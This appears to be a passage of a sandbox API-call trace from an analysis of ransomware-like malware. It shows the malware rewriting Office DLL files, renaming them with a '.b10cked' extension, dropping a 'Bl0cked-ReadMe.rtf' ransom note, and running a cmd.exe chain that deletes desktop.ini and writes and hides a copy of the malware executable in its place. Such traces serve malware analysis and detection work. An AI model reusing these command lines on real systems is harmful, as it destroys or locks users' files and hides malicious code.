[0162.056] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, 
dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xfbc, dwThreadId=0x86c)) returned 1 [0162.136] CloseHandle (hObject=0x1b4) returned 1 [0162.136] CloseHandle (hObject=0x114) returned 1 [0162.136] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0162.136] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0162.136] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0162.136] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.136] ReleaseMutex (hMutex=0xf8) returned 1 [0162.136] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.136] ReleaseMutex (hMutex=0xf8) returned 1 [0162.136] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.136] ReleaseMutex (hMutex=0xf8) returned 1 [0162.136] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0162.136] ReleaseMutex (hMutex=0xf8) returned 1 [0162.136] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21892705571) returned 1 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0162.138] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3760 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.138] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3760 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0162.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3278 [0162.139] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0162.156] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0162.156] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0162.156] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3760 [0162.156] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0162.156] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0162.156] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0162.157] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3760 [0162.157] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0162.157] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0162.157] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1baf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1baf, lpOverlapped=0x0) returned 1 [0162.157] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0162.158] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1baf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1baf, lpOverlapped=0x0) returned 1 [0162.158] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=-7087, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1bb1 [0162.158] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1baf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1baf, lpOverlapped=0x0) returned 1 [0162.159] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7087, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1bb1 [0162.159] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1baf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1baf, lpOverlapped=0x0) returned 1 [0162.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0162.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENVELOPR.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0162.164] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3760 [0162.164] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0162.164] CloseHandle (hObject=0x114) returned 1 [0162.165] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX") returned 0x3c [0162.166] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0162.166] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x8f0, dwThreadId=0x8e4)) returned 1 [0162.171] CloseHandle (hObject=0x1b4) returned 1 [0162.171] CloseHandle (hObject=0x114) returned 1 [0162.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0162.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0162.171] CompareStringW (Locale=0x400, dwCmpFlags=0x0, 
lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 3 [0162.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0162.171] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0162.171] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0162.171] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0162.172] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0162.172] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0162.172] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0162.172] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0162.172] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0162.172] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xfe8, dwThreadId=0x81c)) returned 1 [0162.179] CloseHandle (hObject=0x1b4) returned 1 [0162.179] CloseHandle (hObject=0x114) returned 1 [0162.179] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\bl0cked-readme.rtf")) returned 0xffffffff [0162.179] GetLastError () returned 0x2 [0162.179] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0162.183] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\bl0cked-readme.rtf")) returned 0x2020 [0162.183] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0162.183] FindFirstFileW 
(in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0162.183] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0162.183] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0162.183] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0162.184] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0162.184] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0162.184] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0162.184] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0162.184] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0162.184] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\3082", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082") returned 0x2f [0162.185] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x17a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x17a [0162.185] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0162.185] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, 
